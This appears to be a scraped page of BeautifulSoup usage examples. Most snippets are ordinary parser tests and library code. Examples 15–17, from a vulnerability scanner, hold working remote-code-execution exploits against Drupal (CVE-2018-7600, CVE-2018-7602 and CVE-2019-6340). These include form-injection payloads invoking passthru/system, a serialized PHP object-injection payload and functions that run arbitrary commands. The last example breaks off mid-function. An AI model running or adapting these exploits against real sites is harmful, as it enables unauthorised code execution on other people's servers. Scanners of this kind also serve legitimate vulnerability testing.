Python BeautifulSoup Examples, thirdparty.bs4.BeautifulSoup Python Examples

Example #1

0

Show file

 def fragmentClass(self):
     from thirdparty.bs4 import BeautifulSoup
     # TODO: Why is the parser 'html.parser' here? To avoid an
     # infinite loop?
     self.soup = BeautifulSoup("", "html.parser")
     self.soup.name = "[document_fragment]"
     return Element(self.soup, self.soup, None)

Example #2

0

Show file

    def assertSoupEquals(self, to_parse, compare_parsed_to=None):
        builder = self.default_builder
        obj = BeautifulSoup(to_parse, builder=builder)
        if compare_parsed_to is None:
            compare_parsed_to = to_parse

        self.assertEqual(obj.decode(), self.document_for(compare_parsed_to))

Example #3

0

Show file

File: test_soup.py Project: mohinparamasivam/Cloudmare

    def test_custom_builder_class(self):
        # Verify that you can pass in a custom Builder class and
        # it'll be instantiated with the appropriate keyword arguments.
        class Mock(object):
            def __init__(self, **kwargs):
                self.called_with = kwargs
                self.is_xml = True
                self.store_line_numbers = False
                self.cdata_list_attributes = []
                self.preserve_whitespace_tags = []
                self.string_containers = {}

            def initialize_soup(self, soup):
                pass

            def feed(self, markup):
                self.fed = markup

            def reset(self):
                pass

            def ignore(self, ignore):
                pass

            set_up_substitutions = can_be_empty_element = ignore

            def prepare_markup(self, *args, **kwargs):
                yield "prepared markup", "original encoding", "declared encoding", "contains replacement characters"

        kwargs = dict(
            var="value",
            # This is a deprecated BS3-era keyword argument, which
            # will be stripped out.
            convertEntities=True,
        )
        with warnings.catch_warnings(record=True):
            soup = BeautifulSoup('', builder=Mock, **kwargs)
        assert isinstance(soup.builder, Mock)
        self.assertEqual(dict(var="value"), soup.builder.called_with)
        self.assertEqual("prepared markup", soup.builder.fed)

        # You can also instantiate the TreeBuilder yourself. In this
        # case, that specific object is used and any keyword arguments
        # to the BeautifulSoup constructor are ignored.
        builder = Mock(**kwargs)
        with warnings.catch_warnings(record=True) as w:
            soup = BeautifulSoup(
                '',
                builder=builder,
                ignored_value=True,
            )
        msg = str(w[0].message)
        assert msg.startswith(
            "Keyword arguments to the BeautifulSoup constructor will be ignored."
        )
        self.assertEqual(builder, soup.builder)
        self.assertEqual(kwargs, builder.called_with)

Example #4

0

Show file

    def test_formatter_processes_script_tag_for_xml_documents(self):
        doc = """
  <script type="text/javascript">
  </script>
"""
        soup = BeautifulSoup(doc, "lxml-xml")
        # lxml would have stripped this while parsing, but we can add
        # it later.
        soup.script.string = 'console.log("< < hey > > ");'
        encoded = soup.encode()
        self.assertTrue(b"&lt; &lt; hey &gt; &gt;" in encoded)

Example #5

0

Show file

    def test_beautifulsoup_constructor_does_lookup(self):

        with warnings.catch_warnings(record=True) as w:
            # This will create a warning about not explicitly
            # specifying a parser, but we'll ignore it.

            # You can pass in a string.
            BeautifulSoup("", features="html")
            # Or a list of strings.
            BeautifulSoup("", features=["html", "fast"])

        # You'll get an exception if BS can't find an appropriate
        # builder.
        self.assertRaises(ValueError, BeautifulSoup,
                          "", features="no-such-feature")

Example #6

0

Show file

def ISPCheck(domain):
	try:
		base = 'https://check-host.net/ip-info?host=' + domain
		base_check = requests.get(base).text
		UrlHTML = BeautifulSoup(base_check, "lxml")
		if UrlHTML.findAll('div', {'class':'error'}):
			get_Content = " - cannot retrieve information "
			return get_Content
		get_Content = str([i for i in UrlHTML.findAll('tr', {'class':'zebra'}) if 'Organization' in str(i)][0].get_text(strip=True).split('Organization')[1])
		for cloud in cloudlist:
			if cloud in get_Content:
				get_Content = " - belong " + cloud
				return get_Content
	except:
		return None

Example #7

0

Show file

def benchmark_parsers(num_elements=100000):
    """Very basic head-to-head performance benchmark."""
    print("Comparative parser benchmark on Beautiful Soup %s" % __version__)
    data = rdoc(num_elements)
    print("Generated a large invalid HTML document (%d bytes)." % len(data))

    for parser in ["lxml", ["lxml", "html"], "html5lib", "html.parser"]:
        success = False
        try:
            a = time.time()
            soup = BeautifulSoup(data, parser)
            b = time.time()
            success = True
        except Exception as e:
            print("%s could not parse the markup." % parser)
            traceback.print_exc()
        if success:
            print("BS4+%s parsed the markup in %.2fs." % (parser, b - a))

    from lxml import etree
    a = time.time()
    etree.HTML(data)
    b = time.time()
    print("Raw lxml parsed the markup in %.2fs." % (b - a))

    from thirdparty import html5lib
    parser = html5lib.HTMLParser()
    a = time.time()
    parser.parse(data)
    b = time.time()
    print("Raw html5lib parsed the markup in %.2fs." % (b - a))

Example #8

0

Show file

    def assertSoupEquals(self, to_parse, compare_parsed_to=None):
        builder = self.default_builder
        obj = BeautifulSoup(to_parse, builder=builder)
        if compare_parsed_to is None:
            compare_parsed_to = to_parse

        # Verify that the documents come out the same.
        self.assertEqual(obj.decode(), self.document_for(compare_parsed_to))

        # Also run some checks on the BeautifulSoup object itself:

        # Verify that every tag that was opened was eventually closed.

        # There are no tags in the open tag counter.
        assert all(v==0 for v in list(obj.open_tag_counter.values()))

        # The only tag in the tag stack is the one for the root
        # document.
        self.assertEqual(
            [obj.ROOT_TAG_NAME], [x.name for x in obj.tagStack]
        )

Example #9

0

Show file

    def __init__(self,
                 namespaceHTMLElements,
                 soup=None,
                 store_line_numbers=True,
                 **kwargs):
        if soup:
            self.soup = soup
        else:
            from thirdparty.bs4 import BeautifulSoup
            # TODO: Why is the parser 'html.parser' here? To avoid an
            # infinite loop?
            self.soup = BeautifulSoup("",
                                      "html.parser",
                                      store_line_numbers=store_line_numbers,
                                      **kwargs)
        # TODO: What are **kwargs exactly? Should they be passed in
        # here in addition to/instead of being passed to the BeautifulSoup
        # constructor?
        super(TreeBuilderForHtml5lib, self).__init__(namespaceHTMLElements)

        # This will be set later to an html5lib.html5parser.HTMLParser
        # object, which we can use to track the current line number.
        self.parser = None
        self.store_line_numbers = store_line_numbers

Example #10

0

Show file

File: test_soup.py Project: mohinparamasivam/Cloudmare

    def test_last_ditch_entity_replacement(self):
        # This is a UTF-8 document that contains bytestrings
        # completely incompatible with UTF-8 (ie. encoded with some other
        # encoding).
        #
        # Since there is no consistent encoding for the document,
        # Unicode, Dammit will eventually encode the document as UTF-8
        # and encode the incompatible characters as REPLACEMENT
        # CHARACTER.
        #
        # If chardet is installed, it will detect that the document
        # can be converted into ISO-8859-1 without errors. This happens
        # to be the wrong encoding, but it is a consistent encoding, so the
        # code we're testing here won't run.
        #
        # So we temporarily disable chardet if it's present.
        doc = b"""\357\273\277<?xml version="1.0" encoding="UTF-8"?>
<html><b>\330\250\330\252\330\261</b>
<i>\310\322\321\220\312\321\355\344</i></html>"""
        chardet = bs4.dammit.chardet_dammit
        logging.disable(logging.WARNING)
        try:

            def noop(str):
                return None

            bs4.dammit.chardet_dammit = noop
            dammit = UnicodeDammit(doc)
            self.assertEqual(True, dammit.contains_replacement_characters)
            self.assertTrue("\ufffd" in dammit.unicode_markup)

            soup = BeautifulSoup(doc, "html.parser")
            self.assertTrue(soup.contains_replacement_characters)
        finally:
            logging.disable(logging.NOTSET)
            bs4.dammit.chardet_dammit = chardet

Example #11

0

Show file

File: shodan.py Project: mohinparamasivam/Cloudmare

def searchTitle(domain):
	html = requests.get('http://' + domain).text
	soup = BeautifulSoup(html, 'html.parser')
	title = soup.find('title').string
	return title

Example #12

0

Show file

class TreeBuilderForHtml5lib(treebuilder_base.TreeBuilder):
    def __init__(self,
                 namespaceHTMLElements,
                 soup=None,
                 store_line_numbers=True,
                 **kwargs):
        if soup:
            self.soup = soup
        else:
            from thirdparty.bs4 import BeautifulSoup
            # TODO: Why is the parser 'html.parser' here? To avoid an
            # infinite loop?
            self.soup = BeautifulSoup("",
                                      "html.parser",
                                      store_line_numbers=store_line_numbers,
                                      **kwargs)
        # TODO: What are **kwargs exactly? Should they be passed in
        # here in addition to/instead of being passed to the BeautifulSoup
        # constructor?
        super(TreeBuilderForHtml5lib, self).__init__(namespaceHTMLElements)

        # This will be set later to an html5lib.html5parser.HTMLParser
        # object, which we can use to track the current line number.
        self.parser = None
        self.store_line_numbers = store_line_numbers

    def documentClass(self):
        self.soup.reset()
        return Element(self.soup, self.soup, None)

    def insertDoctype(self, token):
        name = token["name"]
        publicId = token["publicId"]
        systemId = token["systemId"]

        doctype = Doctype.for_name_and_ids(name, publicId, systemId)
        self.soup.object_was_parsed(doctype)

    def elementClass(self, name, namespace):
        kwargs = {}
        if self.parser and self.store_line_numbers:
            # This represents the point immediately after the end of the
            # tag. We don't know when the tag started, but we do know
            # where it ended -- the character just before this one.
            sourceline, sourcepos = self.parser.tokenizer.stream.position()
            kwargs['sourceline'] = sourceline
            kwargs['sourcepos'] = sourcepos - 1
        tag = self.soup.new_tag(name, namespace, **kwargs)

        return Element(tag, self.soup, namespace)

    def commentClass(self, data):
        return TextNode(Comment(data), self.soup)

    def fragmentClass(self):
        from thirdparty.bs4 import BeautifulSoup
        # TODO: Why is the parser 'html.parser' here? To avoid an
        # infinite loop?
        self.soup = BeautifulSoup("", "html.parser")
        self.soup.name = "[document_fragment]"
        return Element(self.soup, self.soup, None)

    def appendChild(self, node):
        # XXX This code is not covered by the BS4 tests.
        self.soup.append(node.element)

    def getDocument(self):
        return self.soup

    def getFragment(self):
        return treebuilder_base.TreeBuilder.getFragment(self).element

    def testSerializer(self, element):
        from thirdparty.bs4 import BeautifulSoup
        rv = []
        doctype_re = re.compile(
            r'^(.*?)(?: PUBLIC "(.*?)"(?: "(.*?)")?| SYSTEM "(.*?)")?$')

        def serializeElement(element, indent=0):
            if isinstance(element, BeautifulSoup):
                pass
            if isinstance(element, Doctype):
                m = doctype_re.match(element)
                if m:
                    name = m.group(1)
                    if m.lastindex > 1:
                        publicId = m.group(2) or ""
                        systemId = m.group(3) or m.group(4) or ""
                        rv.append("""|%s<!DOCTYPE %s "%s" "%s">""" %
                                  (' ' * indent, name, publicId, systemId))
                    else:
                        rv.append("|%s<!DOCTYPE %s>" % (' ' * indent, name))
                else:
                    rv.append("|%s<!DOCTYPE >" % (' ' * indent, ))
            elif isinstance(element, Comment):
                rv.append("|%s<!-- %s -->" % (' ' * indent, element))
            elif isinstance(element, NavigableString):
                rv.append("|%s\"%s\"" % (' ' * indent, element))
            else:
                if element.namespace:
                    name = "%s %s" % (prefixes[element.namespace],
                                      element.name)
                else:
                    name = element.name
                rv.append("|%s<%s>" % (' ' * indent, name))
                if element.attrs:
                    attributes = []
                    for name, value in list(element.attrs.items()):
                        if isinstance(name, NamespacedAttribute):
                            name = "%s %s" % (prefixes[name.namespace],
                                              name.name)
                        if isinstance(value, list):
                            value = " ".join(value)
                        attributes.append((name, value))

                    for name, value in sorted(attributes):
                        rv.append('|%s%s="%s"' % (' ' *
                                                  (indent + 2), name, value))
                indent += 2
                for child in element.children:
                    serializeElement(child, indent)

        serializeElement(element, 0)

        return "\n".join(rv)

Example #13

0

Show file

File: test_soup.py Project: mohinparamasivam/Cloudmare

 def test_warning_if_parser_specified_too_vague(self):
     with warnings.catch_warnings(record=True) as w:
         soup = BeautifulSoup("<a><b></b></a>", "html")
     self._assert_no_parser_specified(w)

Example #14

0

Show file

 def soup(self, markup, **kwargs):
     """Build a Beautiful Soup object from markup."""
     builder = kwargs.pop('builder', self.default_builder)
     return BeautifulSoup(markup, builder=builder, **kwargs)

Example #15

0

Show file

File: Drupal.py Project: zhzyker/vulmap

 def cve_2018_7602_poc(self):
     self.threadLock.acquire()
     self.vul_info["prt_name"] = "Drupal: CVE-2018-7602"
     self.vul_info["prt_resu"] = "null"
     self.vul_info["prt_info"] = "null"
     self.vul_info["vul_urls"] = self.url
     self.vul_info["vul_payd"] = "null"
     self.vul_info[
         "vul_name"] = "Drupal drupalgeddon2 remote code execution"
     self.vul_info["vul_numb"] = "CVE-2018-7602"
     self.vul_info["vul_apps"] = "Drupal"
     self.vul_info["vul_date"] = "2018-06-19"
     self.vul_info["vul_vers"] = "< 7.59, < 8.5.3"
     self.vul_info["vul_risk"] = "high"
     self.vul_info["vul_type"] = "远程代码执行"
     self.vul_info["vul_data"] = "null"
     self.vul_info["vul_desc"] = "这个漏洞是CVE-2018-7600的绕过利用，两个漏洞原理是一样的。" \
                                 "攻击者可以通过不同方式利用该漏洞远程执行代码。" \
                                 "CVE-2018-7602这个漏洞是CVE-2018-7600的另一个利用点，只是入口方式不一样。"
     self.vul_info["cre_date"] = "2021-01-29"
     self.vul_info["cre_auth"] = "zhzyker"
     DRUPAL_U = "admin"
     DRUPAL_P = "admin"
     md = random_md5()
     cmd = "echo " + md
     try:
         self.session = requests.Session()
         self.get_params = {'q': 'user/login'}
         self.post_params = {
             'form_id': 'user_login',
             'name': DRUPAL_U,
             'pass': DRUPAL_P,
             'op': 'Log in'
         }
         self.session.post(self.url,
                           params=self.get_params,
                           data=self.post_params,
                           headers=self.headers,
                           timeout=self.timeout,
                           verify=False)
         self.get_params = {'q': 'user'}
         self.r = self.session.get(self.url,
                                   params=self.get_params,
                                   headers=self.headers,
                                   timeout=self.timeout,
                                   verify=False)
         self.soup = BeautifulSoup(self.r.text, "html.parser")
         self.user_id = self.soup.find('meta', {
             'property': 'foaf:name'
         }).get('about')
         if "?q=" in self.user_id:
             self.user_id = self.user_id.split("=")[1]
         self.get_params = {'q': self.user_id + '/cancel'}
         self.r = self.session.get(self.url,
                                   params=self.get_params,
                                   headers=self.headers,
                                   timeout=self.timeout,
                                   verify=False)
         self.soup = BeautifulSoup(self.r.text, "html.parser")
         self.form = self.soup.find('form',
                                    {'id': 'user-cancel-confirm-form'})
         self.form_token = self.form.find('input', {
             'name': 'form_token'
         }).get('value')
         self.get_params = {
             'q':
             self.user_id + '/cancel',
             'destination':
             self.user_id +
             '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]='
             + cmd
         }
         self.post_params = {
             'form_id': 'user_cancel_confirm_form',
             'form_token': self.form_token,
             '_triggering_element_name': 'form_id',
             'op': 'Cancel account'
         }
         self.r = self.session.post(self.url,
                                    params=self.get_params,
                                    data=self.post_params,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
         self.soup = BeautifulSoup(self.r.text, "html.parser")
         self.form = self.soup.find('form',
                                    {'id': 'user-cancel-confirm-form'})
         self.form_build_id = self.form.find('input', {
             'name': 'form_build_id'
         }).get('value')
         self.get_params = {
             'q':
             'file/ajax/actions/cancel/#options/path/' + self.form_build_id
         }
         self.post_params = {'form_build_id': self.form_build_id}
         self.r = self.session.post(self.url,
                                    params=self.get_params,
                                    data=self.post_params,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
         if md in misinformation(self.r.text, md):
             self.vul_info["vul_data"] = dump.dump_all(self.r).decode(
                 'utf-8', 'ignore')
             self.vul_info["prt_resu"] = "PoCSuCCeSS"
             self.vul_info[
                 "vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd
             self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
         else:
             self.request = requests.get(self.url + "/CHANGELOG.txt",
                                         data=self.payload,
                                         headers=self.headers,
                                         timeout=self.timeout,
                                         verify=False)
             self.rawdata = dump.dump_all(self.request).decode(
                 'utf-8', 'ignore')
             self.allver = re.findall(r"([\d][.][\d]?[.]?[\d])",
                                      self.request.text)
             if self.request.status_code == 200 and r"Drupal" in self.request.text:
                 if '7.59' not in self.allver and '8.5.3' not in self.allver:
                     self.vul_info["vul_data"] = dump.dump_all(
                         self.r).decode('utf-8', 'ignore')
                     self.vul_info["prt_resu"] = "PoC_MaYbE"
                     self.vul_info[
                         "vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd
                     self.vul_info[
                         "prt_info"] = "[maybe] [rce] [cmd:" + cmd + "]"
         verify.scan_print(self.vul_info)
     except requests.exceptions.Timeout:
         verify.timeout_print(self.vul_info["prt_name"])
     except requests.exceptions.ConnectionError:
         verify.connection_print(self.vul_info["prt_name"])
     except Exception as error:
         verify.error_print(self.vul_info["prt_name"])
     self.threadLock.release()

Example #16

0

Show file

File: Drupal.py Project: zhzyker/vulmap

 def cve_2018_7602_exp(self, cmd):
     vul_name = "Drupal: CVE-2018-7602"
     DRUPAL_U = "admin"
     DRUPAL_P = "admin"
     try:
         self.session = requests.Session()
         self.get_params = {'q': 'user/login'}
         self.post_params = {
             'form_id': 'user_login',
             'name': DRUPAL_U,
             'pass': DRUPAL_P,
             'op': 'Log in'
         }
         self.session.post(self.url,
                           params=self.get_params,
                           data=self.post_params,
                           headers=self.headers,
                           timeout=self.timeout,
                           verify=False)
         self.get_params = {'q': 'user'}
         self.r = self.session.get(self.url,
                                   params=self.get_params,
                                   headers=self.headers,
                                   timeout=self.timeout,
                                   verify=False)
         self.soup = BeautifulSoup(self.r.text, "html.parser")
         self.user_id = self.soup.find('meta', {
             'property': 'foaf:name'
         }).get('about')
         if "?q=" in self.user_id:
             self.user_id = self.user_id.split("=")[1]
         self.get_params = {'q': self.user_id + '/cancel'}
         self.r = self.session.get(self.url,
                                   params=self.get_params,
                                   headers=self.headers,
                                   timeout=self.timeout,
                                   verify=False)
         self.soup = BeautifulSoup(self.r.text, "html.parser")
         self.form = self.soup.find('form',
                                    {'id': 'user-cancel-confirm-form'})
         self.form_token = self.form.find('input', {
             'name': 'form_token'
         }).get('value')
         self.get_params = {
             'q':
             self.user_id + '/cancel',
             'destination':
             self.user_id +
             '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]='
             + cmd
         }
         self.post_params = {
             'form_id': 'user_cancel_confirm_form',
             'form_token': self.form_token,
             '_triggering_element_name': 'form_id',
             'op': 'Cancel account'
         }
         self.r = self.session.post(self.url,
                                    params=self.get_params,
                                    data=self.post_params,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
         self.soup = BeautifulSoup(self.r.text, "html.parser")
         self.form = self.soup.find('form',
                                    {'id': 'user-cancel-confirm-form'})
         self.form_build_id = self.form.find('input', {
             'name': 'form_build_id'
         }).get('value')
         self.get_params = {
             'q':
             'file/ajax/actions/cancel/#options/path/' + self.form_build_id
         }
         self.post_params = {'form_build_id': self.form_build_id}
         self.r = self.session.post(self.url,
                                    params=self.get_params,
                                    data=self.post_params,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
         self.raw_data = dump.dump_all(self.r).decode('utf-8', 'ignore')
         verify.exploit_print(self.r.text, self.raw_data)
     except requests.exceptions.Timeout:
         verify.timeout_print(vul_name)
     except requests.exceptions.ConnectionError:
         verify.connection_print(vul_name)
     except Exception:
         verify.error_print(vul_name)

Example #17

0

Show file

File: Drupal.py Project: zhzyker/vulmap

class Drupal():
    def __init__(self, url):
        self.url = url
        if self.url[-1] == "/":
            self.url = self.url[:-1]
        self.raw_data = None
        self.vul_info = {}
        self.ua = globals.get_value("UA")  # 获取全局变量UA
        self.timeout = globals.get_value("TIMEOUT")  # 获取全局变量UA
        self.headers = globals.get_value("HEADERS")  # 获取全局变量HEADERS
        self.threadLock = threading.Lock()
        self.payload_cve_2018_7600 = (
            "form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=system&mail"
            "[#type]=markup&mail[#markup]=RECOMMAND")
        self.payload_cve_2019_6340 = "{\r\n\"link\":[\r\n{\r\n\"value\":\"link\",\r\n\"options\":\"O:24:\\\"" \
                                     "GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\"" \
                                     ";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp" \
                                     "\\\\HandlerStack\\u0000handler\\\";s:%s:\\\"%s\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\" \
                                     "u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\" \
                                     "u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve" \
                                     "\\\";}}\"\r\n}\r\n],\r\n\"_links\":{\r\n\"type\":{\r\n\"href\":\"%s/rest/type/shortcut/default" \
                                     "\"\r\n}\r\n}\r\n}"

    def cve_2018_7600_poc(self):
        self.threadLock.acquire()
        self.vul_info["prt_name"] = "Drupal: CVE-2018-7600"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = self.payload_cve_2018_7600.replace(
            "RECOMMAND", "whoami")
        self.vul_info[
            "vul_name"] = "Drupal drupalgeddon2 remote code execution"
        self.vul_info["vul_numb"] = "CVE-2018-7600"
        self.vul_info["vul_apps"] = "Drupal"
        self.vul_info["vul_date"] = "2018-04-13"
        self.vul_info["vul_vers"] = "6.x, 7.x, 8.x"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "远程代码执行"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "编号CVE-2018-7600 Drupal对表单请求内容未做严格过滤，因此，这使得攻击者可能将恶意注入表单内容" \
                                    "，此漏洞允许未经身份验证的攻击者在默认或常见的Drupal安装上执行远程代码执行。"
        self.vul_info["cre_date"] = "2021-01-29"
        self.vul_info["cre_auth"] = "zhzyker"
        md = random_md5()
        cmd = "echo " + md
        self.payload = self.payload_cve_2018_7600.replace("RECOMMAND", cmd)
        self.path = "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
        try:
            request = requests.post(self.url + self.path,
                                    data=self.payload,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
            if md in misinformation(request.text, md):
                self.vul_info["vul_data"] = dump.dump_all(request).decode(
                    'utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception as error:
            verify.error_print(self.vul_info["prt_name"])
        self.threadLock.release()

    def cve_2018_7602_poc(self):
        self.threadLock.acquire()
        self.vul_info["prt_name"] = "Drupal: CVE-2018-7602"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info[
            "vul_name"] = "Drupal drupalgeddon2 remote code execution"
        self.vul_info["vul_numb"] = "CVE-2018-7602"
        self.vul_info["vul_apps"] = "Drupal"
        self.vul_info["vul_date"] = "2018-06-19"
        self.vul_info["vul_vers"] = "< 7.59, < 8.5.3"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "远程代码执行"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "这个漏洞是CVE-2018-7600的绕过利用，两个漏洞原理是一样的。" \
                                    "攻击者可以通过不同方式利用该漏洞远程执行代码。" \
                                    "CVE-2018-7602这个漏洞是CVE-2018-7600的另一个利用点，只是入口方式不一样。"
        self.vul_info["cre_date"] = "2021-01-29"
        self.vul_info["cre_auth"] = "zhzyker"
        DRUPAL_U = "admin"
        DRUPAL_P = "admin"
        md = random_md5()
        cmd = "echo " + md
        try:
            self.session = requests.Session()
            self.get_params = {'q': 'user/login'}
            self.post_params = {
                'form_id': 'user_login',
                'name': DRUPAL_U,
                'pass': DRUPAL_P,
                'op': 'Log in'
            }
            self.session.post(self.url,
                              params=self.get_params,
                              data=self.post_params,
                              headers=self.headers,
                              timeout=self.timeout,
                              verify=False)
            self.get_params = {'q': 'user'}
            self.r = self.session.get(self.url,
                                      params=self.get_params,
                                      headers=self.headers,
                                      timeout=self.timeout,
                                      verify=False)
            self.soup = BeautifulSoup(self.r.text, "html.parser")
            self.user_id = self.soup.find('meta', {
                'property': 'foaf:name'
            }).get('about')
            if "?q=" in self.user_id:
                self.user_id = self.user_id.split("=")[1]
            self.get_params = {'q': self.user_id + '/cancel'}
            self.r = self.session.get(self.url,
                                      params=self.get_params,
                                      headers=self.headers,
                                      timeout=self.timeout,
                                      verify=False)
            self.soup = BeautifulSoup(self.r.text, "html.parser")
            self.form = self.soup.find('form',
                                       {'id': 'user-cancel-confirm-form'})
            self.form_token = self.form.find('input', {
                'name': 'form_token'
            }).get('value')
            self.get_params = {
                'q':
                self.user_id + '/cancel',
                'destination':
                self.user_id +
                '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]='
                + cmd
            }
            self.post_params = {
                'form_id': 'user_cancel_confirm_form',
                'form_token': self.form_token,
                '_triggering_element_name': 'form_id',
                'op': 'Cancel account'
            }
            self.r = self.session.post(self.url,
                                       params=self.get_params,
                                       data=self.post_params,
                                       headers=self.headers,
                                       timeout=self.timeout,
                                       verify=False)
            self.soup = BeautifulSoup(self.r.text, "html.parser")
            self.form = self.soup.find('form',
                                       {'id': 'user-cancel-confirm-form'})
            self.form_build_id = self.form.find('input', {
                'name': 'form_build_id'
            }).get('value')
            self.get_params = {
                'q':
                'file/ajax/actions/cancel/#options/path/' + self.form_build_id
            }
            self.post_params = {'form_build_id': self.form_build_id}
            self.r = self.session.post(self.url,
                                       params=self.get_params,
                                       data=self.post_params,
                                       headers=self.headers,
                                       timeout=self.timeout,
                                       verify=False)
            if md in misinformation(self.r.text, md):
                self.vul_info["vul_data"] = dump.dump_all(self.r).decode(
                    'utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info[
                    "vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd
                self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
            else:
                self.request = requests.get(self.url + "/CHANGELOG.txt",
                                            data=self.payload,
                                            headers=self.headers,
                                            timeout=self.timeout,
                                            verify=False)
                self.rawdata = dump.dump_all(self.request).decode(
                    'utf-8', 'ignore')
                self.allver = re.findall(r"([\d][.][\d]?[.]?[\d])",
                                         self.request.text)
                if self.request.status_code == 200 and r"Drupal" in self.request.text:
                    if '7.59' not in self.allver and '8.5.3' not in self.allver:
                        self.vul_info["vul_data"] = dump.dump_all(
                            self.r).decode('utf-8', 'ignore')
                        self.vul_info["prt_resu"] = "PoC_MaYbE"
                        self.vul_info[
                            "vul_payd"] = '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]=' + cmd
                        self.vul_info[
                            "prt_info"] = "[maybe] [rce] [cmd:" + cmd + "]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception as error:
            verify.error_print(self.vul_info["prt_name"])
        self.threadLock.release()

    def cve_2019_6340_poc(self):
        self.threadLock.acquire()
        self.vul_info["prt_name"] = "Drupal: CVE-2019-6340"
        self.vul_info["prt_resu"] = "null"
        self.vul_info["prt_info"] = "null"
        self.vul_info["vul_urls"] = self.url
        self.vul_info["vul_payd"] = "null"
        self.vul_info["vul_name"] = "drupal core restful remote code execution"
        self.vul_info["vul_numb"] = "CVE-2019-6340"
        self.vul_info["vul_apps"] = "Drupal"
        self.vul_info["vul_date"] = "2019-02-22"
        self.vul_info["vul_vers"] = "< 8.6.10"
        self.vul_info["vul_risk"] = "high"
        self.vul_info["vul_type"] = "远程代码执行"
        self.vul_info["vul_data"] = "null"
        self.vul_info["vul_desc"] = "POST/PATCH 请求，在进行 REST API 操作的过程中，会将未经安全过滤的参数内容带入unserialize " \
                                    "函数而触发反序列化漏洞，进而导致任意代码执行。"
        self.vul_info["cre_date"] = "2021-01-29"
        self.vul_info["cre_auth"] = "zhzyker"
        self.path = "/node/?_format=hal_json"
        md = random_md5()
        cmd = "echo " + md
        self.cmd_len = len(cmd)
        self.payload = self.payload_cve_2019_6340 % (self.cmd_len, cmd,
                                                     self.url)
        self.headers = {
            'User-Agent': self.ua,
            'Connection': "close",
            'Content-Type': "application/hal+json",
            'Accept': "*/*",
            'Cache-Control': "no-cache"
        }
        try:
            request = requests.post(self.url + self.path,
                                    data=self.payload,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
            if md in misinformation(request.text, md):
                self.vul_info["vul_data"] = dump.dump_all(request).decode(
                    'utf-8', 'ignore')
                self.vul_info["prt_resu"] = "PoCSuCCeSS"
                self.vul_info["vul_urls"] = self.payload
                self.vul_info["prt_info"] = "[rce] [cmd:" + cmd + "]"
            verify.scan_print(self.vul_info)
        except requests.exceptions.Timeout:
            verify.timeout_print(self.vul_info["prt_name"])
        except requests.exceptions.ConnectionError:
            verify.connection_print(self.vul_info["prt_name"])
        except Exception as error:
            verify.error_print(self.vul_info["prt_name"])
        self.threadLock.release()

    def cve_2018_7600_exp(self, cmd):
        vul_name = "Drupal: CVE-2018-7600"
        self.payload = self.payload_cve_2018_7600.replace("RECOMMAND", cmd)
        self.path = "/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax"
        try:
            request = requests.post(self.url + self.path,
                                    data=self.payload,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
            self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
            verify.exploit_print(request.text, self.raw_data)
        except requests.exceptions.Timeout:
            verify.timeout_print(vul_name)
        except requests.exceptions.ConnectionError:
            verify.connection_print(vul_name)
        except Exception:
            verify.error_print(vul_name)

    def cve_2018_7602_exp(self, cmd):
        vul_name = "Drupal: CVE-2018-7602"
        DRUPAL_U = "admin"
        DRUPAL_P = "admin"
        try:
            self.session = requests.Session()
            self.get_params = {'q': 'user/login'}
            self.post_params = {
                'form_id': 'user_login',
                'name': DRUPAL_U,
